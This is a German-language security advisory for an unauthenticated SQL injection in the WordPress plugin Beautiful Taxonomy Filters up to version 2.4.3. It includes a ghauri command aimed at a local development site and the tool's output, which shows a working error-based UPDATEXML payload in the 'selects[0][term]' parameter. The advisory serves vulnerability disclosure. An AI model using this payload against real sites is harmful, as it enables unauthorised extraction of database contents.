
Beautiful Taxonomy Filters <= 2.4.3 - Unauthentifizierte SQL-Injection
Beautiful Taxonomy Filters <= 2.4.3 - Nicht authentifizierte SQL-Injection
Das Beautiful Taxonomy Filters Plugin für WordPress ist in allen Versionen bis einschließlich 2.4.3 anfällig für SQL-Injection über den Parameter 'selects[0][term]', da die vom Benutzer bereitgestellten Parameter nicht ausreichend escaped werden und die vorhandene SQL-Abfrage nicht ausreichend vorbereitet wird. Dadurch ist es nicht authentifizierten Angreifern möglich, zusätzliche SQL-Abfragen in bereits bestehende Abfragen einzufügen, die zum Extrahieren sensibler Informationen aus der Datenbank verwendet werden können.
ghauri -u 'https://wp-dev.ddev.site:443/wp-admin/admin-ajax.php' --data='action=update_filters_callback&selects[0][term]=1&selects[0][operator]=AND&selects[1][term]=1&selects[1][operator]=AND&nonce=d6180bd74e' --level=3 --dbms='mysql'
[13:21:20] [INFO] POST parameter 'selects[0][term]' appears to be 'MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)' injectable
POST parameter 'selects[0][term]' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
Ghauri identified the following injection point(s) with a total of 675 HTTP(s) requests:
---
Parameter: selects[0][term] (POST)
Type: error-based
Title: MySQL >= 5.1 AND string error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (UPDATEXML)
Payload: action=update_filters_callback&selects[0][term]=1 AND UPDATEXML(0,CONCAT_WS('(', '~','r0oth3x49','~'),0)-- wXyW&selects[0][operator]=AND&selects[1][term]=1&selects[1][operator]=AND
---
[13:21:25] [INFO] testing MySQL
[13:21:25] [INFO] confirming MySQL
[13:21:25] [INFO] the back-end DBMS is MySQL
[13:21:25] [INFO] fetched data logged to text files under '/Users/me/.ghauri/wp-dev.ddev.site'
[*] ending @ 13:21:25 /2024-12-09/